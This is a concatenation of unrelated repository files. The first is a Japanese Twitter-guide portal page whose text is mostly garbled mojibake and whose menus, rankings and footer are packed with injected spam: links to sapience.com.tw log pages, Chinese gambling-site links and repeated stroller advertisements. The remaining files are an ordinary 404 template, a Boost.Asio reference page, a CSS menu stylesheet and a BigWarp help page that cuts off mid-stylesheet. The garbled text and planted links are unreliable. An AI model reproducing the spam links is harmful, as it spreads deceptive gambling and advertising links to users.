<a href="" class="block"><img src="http://pbs.twimg.com/media/CXxje1GUMAAo8pE.jpg" class="article-thumbnail" alt="" /></a>
</div>
<div class="home-buzzlinks">
<h2 class="small"><a href="">ãªã¢ã·ã</a>ï¼</h2>
<ol class="home-rankinglist">
<li class="small list-s"><a href="" class="ranking"><span class="rank rank1">1</span>ãã³ãã¨åçã®é¢ä¿æ§ã«ã¤ãã¦ã</a></li>
<li class="small list-s"><a href="http://sapience.com.tw/logs/site-nipponki/02021648946.html">http://sapience.com.tw/logs/site-nipponki/02021648946.html</a></li>
<li class="small list-s"><a href="" class="ranking"><span class="rank rank3">3</span>åä¾ãã¡ã«ãããããã¹ã¦ã®å¤§äººãã¡ã¸ããã¾...</a></li>
</ol>
</div>
<div class="clearfix"></div>
<div class="column home-buzzimage">
<a href="/topics/lifestyle/560bcdc1-aa20-49c0-aa74-6230ac133a21" class="block"><img src="http://twinavi.jp/articles/wp-content/uploads/2015/11/tweet-alt-pic.png" class="article-thumbnail" alt="" /></a>
</div>
<div class="home-buzzlinks">
<h2 class="small"><a href="">ã©ã¤ãã¹ã¿ã¤ã«</a>ï¼</h2>
<ol class="home-rankinglist">
<li class="small list-s"><a href="http://sapience.com.tw/logs/site-nipponki/02021640899.html">http://sapience.com.tw/logs/site-nipponki/02021640899.html</a></li>
<li class="small list-s"><a href="" class="ranking"><span class="rank rank2">2</span>æ¯ãä¸å¹¸ãªã®ã¯ãããã®ããã§ã¯ãªããããã...</a></li>
<li class="small list-s"><a href="" class="ranking"><span class="rank rank3">3</span>ãã¤ã¤ã«ãã¤ãã¼ã©ã㯠ãã¥ã¼ã¨ã¼ã¯ããã¼ ã«ãã¼ã¸ Katojiãªã¯ã©ã¤ãã³ã° New York Baby ããã¼ã©ãã¯ãHLS_DUã</a></li>
</ol>
</div>
<div class="clearfix"></div>
<div class="column home-buzzimage">
<a href="" class="block"><img src="/img/topics/thumbnail/internetcom.gif?1450773495" class="article-thumbnail" alt="" /></a>
</div>
<div class="home-buzzlinks">
<h2 class="small"><a href="">IT</a>ï¼</h2>
<ol class="home-rankinglist">
<li class="small list-s"><a href="" class="ranking"><span class="rank rank1">1</span>Google ã«ã¬ã³ãã¼ã®ãã¼ã¿ã Excel ã«ã¨ã¯ã¹...</a></li>
<li class="small list-s"><a href="http://sapience.com.tw/logs/site-nipponki/02021710423.html">http://sapience.com.tw/logs/site-nipponki/02021710423.html</a></li>
<li class="small list-s"><a href="" class="ranking"><span class="rank rank3">3</span>å®¶æã§ä½¿ããããLINEã¹ã¿ã³ãç»å ´--ãæ´æ¿¯ã...</a></li>
</ol>
</div>
<div class="clearfix"></div>
<div class="column home-buzzimage">
<a href="" class="block"><img src="http://www.gizmodo.jp/images/2015/12/151225arcticwinter.jpg" class="article-thumbnail" alt="" /></a>
</div>
<div class="home-buzzlinks">
<h2 class="small"><a href="">ã«ã«ãã£ã¼</a>ï¼</h2>
<ol class="home-rankinglist">
<li class="small list-s"><a href="" class="ranking"><span class="rank rank1">1</span>æ¨è£½ããã¼ãµã¼ã¯ã«123 6æã»ããï¼ããã¥ã©ã«ï¼ãªãªã¸ãã« ããã¼ãµã¼ã¯ã«ãHLS_DUã</a></li>
<li class="small list-s"><a href="" class="ranking"><span class="rank rank2">2</span>æµ·ã®ä¸ã¯ãã¼ãã«é«ãããâ¦SpaceXãã¤ãã«å°...</a></li>
<li class="small list-s"><a href="http://sapience.com.tw/logs/site-nipponki/02021646464.html">http://sapience.com.tw/logs/site-nipponki/02021646464.html</a></li>
</ol>
</div>
<div class="clearfix"></div>
<div class="column home-buzzimage">
<a href="" class="block"><img src="http://f.image.geki.jp/data/image/news/2560/154000/153676/news_153676_1.jpg" class="article-thumbnail" alt="" /></a>
</div>
<div class="home-buzzlinks">
<h2 class="small"><a href="">ã¹ãã¼ã</a>ï¼</h2>
<ol class="home-rankinglist">
<li class="small list-s"><a href="" class="ranking"><span class="rank rank1">1</span>徳島ãDFææ¾ã®å¥ç´æºäºãçºè¡¨</a></li>
<li class="small list-s"><a href="http://sapience.com.tw/logs/site-nipponki/02021650589.html">http://sapience.com.tw/logs/site-nipponki/02021650589.html</a></li>
<li class="small list-s"><a href="" class="ranking"><span class="rank rank3">3</span>ãå½¼ãã¯ç´ æ´ããã鏿ãåæ§ç£¨ããç¥å¥å·ç...</a></li>
</ol>
</div>
<div class="clearfix"></div>
</div>
</section>
<section id="home-faq" class="section">
<h1 class="section-title small navi"><a href="">Twitterä½¿ãæ¹ã¬ã¤ãããããã質åã¢ã¯ã»ã¹ã©ã³ãã³ã°</a></h1>
<div class="section-body">
<ol>
<li class="small list-l lined"><a href="http://sapience.com.tw/logs/site-nipponki/02021636332.html">http://sapience.com.tw/logs/site-nipponki/02021636332.html</a></li>
<li class="small list-l lined"><a href="" class="ranking"><span class="rank rank2">2</span>èªåã®ãã¤ã¼ããåé¤ããã«ã¯ã©ããããããã§ããï¼</a></li>
<li class="small list-l lined"><a href="" class="ranking"><span class="rank rank3">3</span>ã·ãã£ãã¬ã㯠Citi Trek ã°ã¬ã³ GRACO ããã¼ã«ã¼?ãã®ã¼ ä¸è¼ªããã¼ã«ã¼ Aåããã¼ã«ã¼</a></li>
</ol>
</div>
<div class="section-footer">
<a href="" class="link-more">ãã£ã¨ç¥ãããï¼ãTwitterä½¿ãæ¹ã¬ã¤ãã</a>
</div>
</section>
</div>
</div>
<aside class="column sub">
<section id="twinavi-tweet" class="section">
<h1 class="section-title small">ææ°ã®ãã¤ãããã¤ã¼ã</h1>
<div class="section-body">
<p class="small">ã話é¡ã®ãã¤ã¼ããç§ããâªãæãä¼ãããâª ç·æ¥åºåãâªãã£ã¦æãã°ãåä¾éã¯â¦ <a rel="nofollow" target="_blank" href="">GT ã¸ã¼ãã£ã¼ã¢ãã㣠Atti ã®å¾ç¶æ©ç¨®ï¼ã¤ã¿ãªã¢ã³ãã©ãã¯ï¼ ã°ã¬ã³ GRACO ã¢ãããªã« Aprica ãã£ã¤ã«ãã·ã¼ã ã¸ã¥ãã¢ã·ã¼ã</a></p>
</div>
<div class="follow_sidebar follow_twitter">
<span class="altimg hukidashi"></span>
<div class="column">
<a href="" title="ãã¤ããã®Twitterã¢ã«ã¦ã³ã" class="altimg icon m ic-twinavi"> ããã ãã¨ãããã¼ L ããã¼ã²ã¼ã ã»ã¼ãã㣠èªç«å¼ ãè¨ç½®å¹
140ãã180cmã æ¥æ¬è²å
NihonikujiãHLS_DUã
<</a>
</div>
<div class="giftext icon-m">
<a href="" title="ãã¤ããã®Twitterã¢ã«ã¦ã³ã" class="small">Twitterã®ææ°æ
å ±ããã§ãã¯ãããï¼</a>
<a href="https://twitter.com/" class="twitter-follow-button" data-show-count="false" data-lang="ja" data-show-screen-name="true">ããã©ãã¼</a>
</div>
<div class="clearfix"></div>
</div>
</section>
<section id="facebook" class="section">
<p class="small">Facebook<a href="http://www.xpj3344111.com/">ÐÂÆÏ¾©ÓéÀÖ</a>
<a href="http://www.zq3344111.com/">ÕæÇ®Å£Å£</a>
<a href="http://www.ylc3344111.com/">ÓéÀÖ³Ç</a>
<a href="http://www.xy28tu.com/">pcµ°µ°×ßÊÆÍ¼</a>
<a href="http://www.pcrgs.com/">pcµ°µ°ÔÚÏßÔ¤²âÍø</a>
<a href="http://www.nin168.com/">pcµ°µ°ÐÒÔË28app</a>
<a href="http://www.xinjiapo28app.com/">ÐÂ¼ÓÆÂÐÒÔË28app</a>
<a href="http://www.jianada28app.com/">¼ÓÄôóÐÒÔË28</a>
<a href="http://www.kuai28.com/">ÐÒÔË28¼¼ÇÉ</a>
<a href="http://www.pcdd-app.com/">pcµ°µ°ÐÒÔË28app</a>
<a href="http://www.xy28xiazai.com/">pcµ°µ°×ßÊÆÍ¼</a>
<a href="http://www.8883344111.com/">888ÕæÈËÓéÀÖ</a>
<a href="http://www.uni588.com/web/zhongbanghaotie/25562.html">È«Ñ¶Íø</a>
<a href="http://www.uni588.com/web/zhongbanghaotie/25563.html">ÕæÈËţţ</a>
<a href="http://www.yl3344111.com/">ÓÀÀûÓéÀÖ</a>
<a href="http://www.qx3344111.com/">È«Ñ¶Íø</a>
<a href="http://www.zr3344111.com/">888ÕæÈËÓéÀÖ</a>
<a href="http://www.xy28uu.com/">xy28Ô¤²â</a></p>
<div class="follow_fb"><div id="fb-root"></div><div class="fb-like" data-href="https://www.facebook.com/" data-send="false" data-layout="button_count" data-width="55" data-show-faces="false"></div></div>
</section>
<section id="home-side-account" class="section">
<h1 class="section-title small sub"><a href="">æåã¢ã«ã¦ã³ããæ¢ã</a></h1>
<div class="section-body-sub">
<ul>
<li>
<a href="" class="lined all block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/645312064815128576/v_uMNqPs_bigger.jpg" alt="GACKT" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
ç·å<br />
<span class="num mute xsmall">71,071人</span>
</span>
</a>
</li>
<li>
<a href="" class="lined block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/645312064815128576/v_uMNqPs_bigger.jpg" alt="GACKT" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
æå人ã»è¸è½äºº<br />
<span class="num mute xsmall">2,867人</span>
</span>
</a>
</li>
<li>
<a href="" class="lined block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/680394216774619138/6MmJRmsb_bigger.jpg" alt="ã¿ã¯ã¼ã¬ã³ã¼ãå·å´åº(éç§°:ã¿ã¯å´)" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
ã¨ã³ã¿ã¡<br />
<span class="num mute xsmall">3,226人</span>
</span>
</a>
</li>
<li>
<a href="" class="lined block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/525836947420237824/MNKjOzix_bigger.png" alt="SHOPLIST" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
<span style="letter-spacing:-2px">ãããã»ãã§ãã</span><br />
<span class="num mute xsmall">6,128人</span>
</span>
</a>
</li>
<li>
<a href="" class="lined block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/609171843761594368/oBhlek1O_bigger.png" alt="ã·ã§ããã¸ã£ãã³ãå
¬å¼ã" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
ã¡ãã£ã¢<br />
<span class="num mute xsmall">ã¬ã´ ãã¬ã³ãº</span>
</span>
</a>
</li>
<li>
<a href="" class="lined block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/428453450527940609/6BmKmb99_bigger.jpeg" alt="æå·å¸æå±±åç©åï¼»å
¬å¼ï¼½" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
社ä¼ã»æ¿æ²»<br />
<span class="num mute xsmall">886人</span>
</span>
</a>
</li>
<li>
<a href="" class="lined block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/1245987829/tokoro_san_bigger.jpg" alt="æè±ç·" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
ã¹ãã¼ã<br />
<span class="num mute xsmall">1,080人</span>
</span>
</a>
</li>
<li>
<a href="" class="lined last block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/666407537084796928/YBGgi9BO_bigger.png" alt="Twitter" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
ãã¸ãã¹ã»çµæ¸<br />
<span class="num mute xsmall">äºäººä¹ãããã¼ã«ã¼ï¼ã¤ã³ã°ãªãã·ã¼ãï¼</span>
</span>
</a>
</li>
<li>
<a href="" class="lined last block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/525836947420237824/MNKjOzix_bigger.png" alt="SHOPLIST" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
ãµã¼ãã¹<br />
<span class="num mute xsmall">3,871人</span>
</span>
</a>
</li>
</ul>
<div class="clearfix"></div>
</div>
</section>
<section class="section">
<h1 class="section-title small sub"><a href="">ãã¤ãã¿ã¼ä½¿ãæ¹ã¬ã¤ã</a></h1>
<div class="section-body-sub">
<ul>
<li class="small dotted lined"><a href="http://sapience.com.tw/logs/site-nipponki/02021644967.html">http://sapience.com.tw/logs/site-nipponki/02021644967.html</a></li>
<li class="small dotted lined"><a href="">åºæ¬çãªä½¿ãæ¹</a></li>
<li class="small dotted lined"><a href="http://sapience.com.tw/logs/site-nipponki/02021704391.html">http://sapience.com.tw/logs/site-nipponki/02021704391.html</a></li>
<li class="small dotted lined"><a href="">FAQ ãããã質å</a></li>
<li class="small dotted lined last" last><a href="">ã´ã§ãã¼ããã¤ã³</a></li>
</ul>
</div>
</section>
<div class="section section-fbwidget">
<div class="section-title small sub">Facebook</div>
<div class="fb-like-box" data-href="http://www.facebook.com/" data-width="292" data-height="255" data-colorscheme="light" data-show-faces="true" data-header="false" data-stream="false" data-show-border="false"> ããã ãã¨ãããã¼ L ããã¼ã²ã¼ã ã»ã¼ãã㣠èªç«å¼ ãè¨ç½®å¹
140ãã180cmã æ¥æ¬è²å
NihonikujiãHLS_DUã
</div>
</div>
</aside>
<div class="clearfix"></div>
<nav class="contents">
<br />
<a href="" class="link-top absright">ãã¼ã¸ã®ä¸é¨ã¸</a>
</nav>
</div>
<footer id="pagefooter" class="wrapper">
<div class="contents">
<nav>
<ul id="sitemap">
<li class="sitemap-block"><span class="top-sitemap"><a href="" class="servicename ti-topics">話é¡</a></span>
<ul>
<li><a href="http://sapience.com.tw/logs/site-nipponki/02021700339.html">http://sapience.com.tw/logs/site-nipponki/02021700339.html</a></li>
<li><a href="">ãã¥ã¼ã¹</a></li>
<li><a href="">ããã¡ãï¼æ¥æ¬è²å
ï¼</a></li>
<li><a href="http://sapience.com.tw/logs/site-nipponki/02021647588.html">http://sapience.com.tw/logs/site-nipponki/02021647588.html</a></li>
<li><a href="">ã¨ã³ã¿ã¡</a></li>
<li><a href="">IT</a></li>
<li><a href="">ã«ã«ãã£ã¼</a></li>
<li><a href=""> ããã ãã¨ãããã¼ L ããã¼ã²ã¼ã ã»ã¼ãã㣠èªç«å¼ ãè¨ç½®å¹
140ãã180cmã æ¥æ¬è²å
NihonikujiãHLS_DUã
</a></li>
<li><a href="">ãç¥ãã</a></li>
</ul>
<br class="block clearfix"><br>
<span class="top-sitemap"><a href="" class="servicename ti-matome">ã¾ã¨ã</a></span>
<ul>
<li><a href="http://twinavi.jp/matome/category/%E3%82%B3%E3%83%9F%E3%83%83%E3%82%AF%E3%83%BB%E3%82%A2%E3%83%8B%E3%83%A1">ã³ããã¯ã»ã¢ãã¡</a></li>
<li><a href="http://twinavi.jp/matome/category/%E3%82%B2%E3%83%BC%E3%83%A0">ã²ã¼ã </a></li>
<li><a href="">æ ç»</a></li>
<li><a href="" class="div-inner small on">TVçªçµ</a></li>
<li><a href="">è¸è½ï¼æµ·å¤ï¼</a></li>
<li><a href="http://twinavi.jp/matome/category/%E8%8A%B8%E8%83%BD%EF%BC%88%E5%9B%BD%E5%86%85%EF%BC%89">è¸è½ï¼å½å
ï¼</a></li>
<li><a href="http://twinavi.jp/matome/category/%E3%83%97%E3%83%AD%E9%87%8E%E7%90%83">ããéç</a></li>
<li><a href="">Jãªã¼ã°</a></li>
<li><a href="">ããªã¼ã ã¿ã¦ã³</a></li>
<li><a href="http://twinavi.jp/matome/category/%E3%82%AC%E3%82%B8%E3%82%A7%E3%83%83%E3%83%88">ã¬ã¸ã§ãã</a></li>
<li><a href="http://sapience.com.tw/logs/site-nipponki/02021655155.html">http://sapience.com.tw/logs/site-nipponki/02021655155.html</a></li>
<li><a href="">ããã°ããºï¼BuddyBuddyï¼</a></li>
<li><a href="http://sapience.com.tw/logs/site-nipponki/02021654178.html">http://sapience.com.tw/logs/site-nipponki/02021654178.html</a></li>
<li><a href="">IT</a></li>
<li><a href="http://twinavi.jp/matome/category/%E9%9F%B3%E6%A5%BD">鳿¥½</a></li>
<li><a href=""> ããã ãã¨ãããã¼ L ããã¼ã²ã¼ã ã»ã¼ãã㣠èªç«å¼ ãè¨ç½®å¹
140ãã180cmã æ¥æ¬è²å
NihonikujiãHLS_DUã
</a></li>
<li><a href="">社ä¼</a></li>
<li><a href="http://sapience.com.tw/logs/site-nipponki/02021652360.html">http://sapience.com.tw/logs/site-nipponki/02021652360.html</a></li>
</ul>
<br class="block clearfix"><br>
</li>
<li class="sitemap-block">
<span class="top-sitemap"><a href="http://sapience.com.tw/logs/site-nipponki/02021639329.html">http://sapience.com.tw/logs/site-nipponki/02021639329.html</a></span>
<ul>
<li><a href="">ã¤ã³ã¿ãã¥ã¼ ä¸è¦§</a></li>
</ul>
<br class="block clearfix"><br>
<span class="top-sitemap"><a href="" class="servicename ti-account">Twitter</a></span>
<ul>
<li><a href="./index.html">ç·å</a></li>
<li><a href="http://twinavi.jp/account/list/%E6%9C%89%E5%90%8D%E4%BA%BA%E3%83%BB%E8%8A%B8%E8%83%BD%E4%BA%BA">æå人ã»è¸è½äºº</a></li>
<li><a href="">ã¨ã³ã¿ã¡</a></li>
<li><a href="http://sapience.com.tw/logs/site-nipponki/02021659742.html">http://sapience.com.tw/logs/site-nipponki/02021659742.html</a></li>
<li><a href="">ã¡ãã£ã¢</a></li>
<li><a href="http://twinavi.jp/account/list/%E3%83%93%E3%82%B8%E3%83%8D%E3%82%B9%E3%83%BB%E7%B5%8C%E6%B8%88">ãã¸ãã¹ã»çµæ¸</a></li>
<li><a href=""> ããã ãã¨ãããã¼ L ããã¼ã²ã¼ã ã»ã¼ãã㣠èªç«å¼ ãè¨ç½®å¹
140ãã180cmã æ¥æ¬è²å
NihonikujiãHLS_DUã
</a></li>
<li><a href="">ã¹ãã¼ã</a></li>
<li><a href="">ãµã¼ãã¹</a></li>
<li><a href="http://sapience.com.tw/logs/site-nipponki/02021704139.html">http://sapience.com.tw/logs/site-nipponki/02021704139.html</a></li>
</ul>
<br class="block clearfix"><br>
<span class="top-sitemap"><a href="" class="servicename ti-topics">ç¹å¥ä¼ç»</a></span>
<ul>
<li class="clearfix"><a href="">ã¢ã³ã±ã¼ã</a></li>
<li><a href="">鏿</a></li>
</ul>
</li>
<li class="sitemap-block"><span class="top-sitemap"><a href="" class="servicename ti-guide">Twitterä½¿ãæ¹ã¬ã¤ã</a></span>
<ul>
<li><a href="http://sapience.com.tw/logs/site-nipponki/02021706524.html">http://sapience.com.tw/logs/site-nipponki/02021706524.html</a></li>
<li><a href="">Twitterã¨ã¯</a></li>
<li><a href="http://sapience.com.tw/logs/site-nipponki/02021646843.html">http://sapience.com.tw/logs/site-nipponki/02021646843.html</a></li>
<li><a href=""> ããã ãã¨ãããã¼ L ããã¼ã²ã¼ã ã»ã¼ãã㣠èªç«å¼ ãè¨ç½®å¹
140ãã180cmã æ¥æ¬è²å
NihonikujiãHLS_DUã
</a></li>
<li><a href="">ãããã質å</a></li>
<li><a href="http://sapience.com.tw/logs/site-nipponki/02021640689.html">http://sapience.com.tw/logs/site-nipponki/02021640689.html</a></li>
</ul>
<br class="block clearfix"><br>
<span class="top-sitemap"><a href="" class="servicename ti-twitter">ãã¤ãã¿ã¼æ¤ç´¢</a></span>
<ul>
<li><a href="">ãã¼ã¯ã¼ãæ¤ç´¢</a></li>
<li><a href="">ã¦ã¼ã¶ã¼ä¼è©±æ¤ç´¢</a></li>
</ul>
<br class="block clearfix"><br>
<span class="top-sitemap"><a href="" class="servicename ti-help">ãã¤ãããã«ã</a></span>
<ul>
<li><a href="http://sapience.com.tw/logs/site-nipponki/02021710554.html">http://sapience.com.tw/logs/site-nipponki/02021710554.html</a></li>
<li><a href="">ãããã質å</a></li>
</ul>
</li>
</ul>
</nav>
<div class="clearfix"></div>
</div>
<div id="footer-giftext">
<div class="contents">
<!-- giftext -->
<div class="column footer-giftext">
<div class="column">
<a href="http://sapience.com.tw/logs/site-nipponki/02021700453.html">http://sapience.com.tw/logs/site-nipponki/02021700453.html</a>
</div>
<div class="giftext icon-m">
<span class="subtitle">ãã¤ããå
¬å¼Twitter</span>
<a href="" class="twitter-follow-button" data-show-count="false" data-lang="ja" data-show-screen-name="false">ãã¡ã¤ã³ã¢ã¼ã« ã«ã«ã㪠ã»ãã¥ã¢ï¼ã°ãªã¼ã³ï¼ ãªããã§ã« Richellãã«ã«ããªå¾ç¶æ©ã ããã¼ãã®ã¼ Båããã¼ã«ã¼ãHLS_DUã</a>
</div>
</div>
<div class="column footer-giftext">
<div class="column">
<a href="https://www.facebook.com/" target="_blank" class="altimg icon m ic-facebook">facebook</a>
</div>
<div class="giftext icon-m">
<span class="subtitle">ãã¤ããå
¬å¼Facebook</span>
<div id="fb-root"></div><div class="fb-like" data-href="https://www.facebook.com/" data-send="false" data-layout="button_count" data-width="200" data-show-faces="false"> ããã ãã¨ãããã¼ L ããã¼ã²ã¼ã ã»ã¼ãã㣠èªç«å¼ ãè¨ç½®å¹
140ãã180cmã æ¥æ¬è²å
NihonikujiãHLS_DUã
</div>
</div>
</div>
<div class="column footer-giftext twinavismart">
<div class="column">
<a href="" class="altimg icon m ic-twinavismart">ãã¤ããforã¹ãã¼ããã©ã³</a>
</div>
<div class="giftext icon-m">
<span class="subtitle"><a href="">ãã¤ããforã¹ãã¼ããã©ã³</a></span>
<span class="xsmall"><a href="">ã¹ãã¼ããã©ã³ã§ã¢ã¯ã»ã¹ï¼</a></span>
</div>
</div>
<!-- //giftext -->
<div class="clearfix"></div>
</div>
</div>
<div class="contents last">
<ul id="docs" class="centered xsmall">
<li><a href="">ãã¤ãã ãã¼ã </a></li>
<li><a href="">å©ç¨è¦ç´</a></li>
<li><a href="http://www.garage.co.jp/corporate/policy/index.html" target="_blank">å人æ
å ±ä¿è·æ¹é</a></li>
<li><a href="">å¥å
¨åã«é¢ããæé</a></li>
<li><a href="http://sapience.com.tw/logs/site-nipponki/02021640250.html">http://sapience.com.tw/logs/site-nipponki/02021640250.html</a></li>
<li><a href="http://sapience.com.tw/logs/site-nipponki/02021707662.html">http://sapience.com.tw/logs/site-nipponki/02021707662.html</a></li>
<li><a href="">åºåæ²è¼ã«ã¤ãã¦</a></li>
<li class="last"><a href="">ãåãåãã</a>
</ul>
<p class="centered xsmall"><small>Copyright © 2016 All rights reserved.</small></p>
</div>
</footer>
<div class="hide">
<div id="preregister-box">
<p class="preregister-title large"> ããã ãã¨ãããã¼ L ããã¼ã²ã¼ã ã»ã¼ãã㣠èªç«å¼ ãè¨ç½®å¹
140ãã180cmã æ¥æ¬è²å
NihonikujiãHLS_DUã
</p>
<p class="preregister-text">ã¹ã«ã³ã¸ããã¢ã³<br/>ã¢ã¤ãã¹ã³ã³ã ã㪠ããã¬ãã¢ã ã«ã©ã¼ã ï¼ãµãã¡ãªï¼ã°ãªã¼ã³ï¼ ã¢ã¤ãã¹ ides compo neoä¸è¼ªè» ã®ããã®ãHLS_DUã, ããã ãã¨ãããã¼ L ããã¼ã²ã¼ã ã»ã¼ãã㣠èªç«å¼ ãè¨ç½®å¹
140ãã180cmã æ¥æ¬è²å
NihonikujiãHLS_DUã
</p>
<p><a href="" class="btn login preregister-login">Twitterã§ã®èªè¨¼ã«é²ã</a></p>
</div>
</div>
</body>
</html>
|
web/templates/404.html | agrif/osubus | {% extends "base.html" %}
{% block title %}Page not Found{% endblock %}
{% block base_content %}
<h1>Page not Found</h1>
<p>The page you're looking for wasn't found. Likely, this is due to a mistyped link or moved page. If you feel that this page really <em>should</em> exist, drop me a line at <a href="mailto:griffith.637@osu.edu">griffith.637@osu.edu</a>, or by <a href="http://gamma-level.com/contact">other means</a>.</p>
{% endblock %}
|
coflo-0.0.4/third_party/boost_1_48_0/doc/html/boost_asio/reference/basic_socket_acceptor/local_endpoint.html | charlesDGY/coflo | <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>basic_socket_acceptor::local_endpoint</title>
<link rel="stylesheet" href="../../../../../doc/src/boostbook.css" type="text/css">
<meta name="generator" content="DocBook XSL Stylesheets V1.76.1">
<link rel="home" href="../../../boost_asio.html" title="Boost.Asio">
<link rel="up" href="../basic_socket_acceptor.html" title="basic_socket_acceptor">
<link rel="prev" href="listen/overload2.html" title="basic_socket_acceptor::listen (2 of 2 overloads)">
<link rel="next" href="local_endpoint/overload1.html" title="basic_socket_acceptor::local_endpoint (1 of 2 overloads)">
</head>
<body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF">
<table cellpadding="2" width="100%"><tr>
<td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../../boost.png"></td>
<td align="center"><a href="../../../../../index.html">Home</a></td>
<td align="center"><a href="../../../../../libs/libraries.htm">Libraries</a></td>
<td align="center"><a href="http://www.boost.org/users/people.html">People</a></td>
<td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td>
<td align="center"><a href="../../../../../more/index.htm">More</a></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="listen/overload2.html"><img src="../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../basic_socket_acceptor.html"><img src="../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../boost_asio.html"><img src="../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="local_endpoint/overload1.html"><img src="../../../../../doc/src/images/next.png" alt="Next"></a>
</div>
<div class="section">
<div class="titlepage"><div><div><h4 class="title">
<a name="boost_asio.reference.basic_socket_acceptor.local_endpoint"></a><a class="link" href="local_endpoint.html" title="basic_socket_acceptor::local_endpoint">basic_socket_acceptor::local_endpoint</a>
</h4></div></div></div>
<p>
<a class="indexterm" name="id1139459"></a>
Get the local endpoint of the acceptor.
</p>
<pre class="programlisting"><span class="identifier">endpoint_type</span> <a class="link" href="local_endpoint/overload1.html" title="basic_socket_acceptor::local_endpoint (1 of 2 overloads)">local_endpoint</a><span class="special">()</span> <span class="keyword">const</span><span class="special">;</span>
<span class="emphasis"><em>» <a class="link" href="local_endpoint/overload1.html" title="basic_socket_acceptor::local_endpoint (1 of 2 overloads)">more...</a></em></span>
<span class="identifier">endpoint_type</span> <a class="link" href="local_endpoint/overload2.html" title="basic_socket_acceptor::local_endpoint (2 of 2 overloads)">local_endpoint</a><span class="special">(</span>
<span class="identifier">boost</span><span class="special">::</span><span class="identifier">system</span><span class="special">::</span><span class="identifier">error_code</span> <span class="special">&</span> <span class="identifier">ec</span><span class="special">)</span> <span class="keyword">const</span><span class="special">;</span>
<span class="emphasis"><em>» <a class="link" href="local_endpoint/overload2.html" title="basic_socket_acceptor::local_endpoint (2 of 2 overloads)">more...</a></em></span>
</pre>
</div>
<table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr>
<td align="left"></td>
<td align="right"><div class="copyright-footer">Copyright © 2003-2011 Christopher
M. Kohlhoff<p>
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>)
</p>
</div></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="listen/overload2.html"><img src="../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../basic_socket_acceptor.html"><img src="../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../boost_asio.html"><img src="../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="local_endpoint/overload1.html"><img src="../../../../../doc/src/images/next.png" alt="Next"></a>
</div>
</body>
</html>
|
css/styles_original.css | Edutictac/secretictac | .menu{
font-family: Arial, Helvetica, sans-serif;
padding:0;
list-style:none;
width:200px;
font-size:12px;
background:#efebf6;
border: 1px solid rgba(0,0,0,0.8);
float:left;
margin-right: 20px;
min-height: 650px;
height: auto !important;
height: 650px;
}
.menu li a{
display: block;
border-bottom: 1px solid rgba(0,0,0, 0.2);
border-top: 1px solid rgba(255,255,255, 0.2);
background:#efebf6;
text-decoration:none;
color:#2e3191;
padding:10px;
padding-left:20px;
}
.menu li ul li a{
font-size:12px;
color:#47689d;
}
.menu li a:hover{
background:#4a6ba2;
-moz-transition: background 0.3s ease-in;
-webkit-transition: background 0.3s ease-in;
-o-transition: background 0.3s ease-in;
color:#FFFFFF;
}
.menu ul{
margin:0;
padding:0;
list-style:none;
height:0;
overflow: hidden;
transition:1s;
-moz-transition:1s;
-webkit-transition:1s;
}
.menu li:hover ul{
height:120px;
overflow-y:auto;
overflow-x:hidden;
}
.menu ul li a{
background:#fafafa;
}
.menu ul li a:hover {
background: none repeat scroll 0 0 #ccc;
color: #fff;
-moz-transition: color 0.4s ease;
-webkit-transition: color 0.4s ease;
-o-transition: color 0.4s ease;
} |
src/main/resources/viewer/BigWarpHelp.html | saalfeldlab/bigwarp | <!--
#%L
BigWarp plugin for Fiji.
%%
Copyright (C) 2015 - 2021 Howard Hughes Medical Institute.
%%
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 2 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public
License along with this program. If not, see
<http://www.gnu.org/licenses/gpl-2.0.html>.
#L%
-->
<!-- vim::set expandtab tabstop=4 softtabstop=2 shiftwidth=2: -->
<html>
<style TYPE="text/css">
h2
{
margin-bottom: 0px;
}
table, tr, td
{
border-spacing: 0px;
}
table
{
width:100%;
border-top: 1px solid black;
border-right: 1px solid black;
background-color:#f8f8f8;
}
td
{
padding:5px;
padding-right:10px;
padding-left:10px;
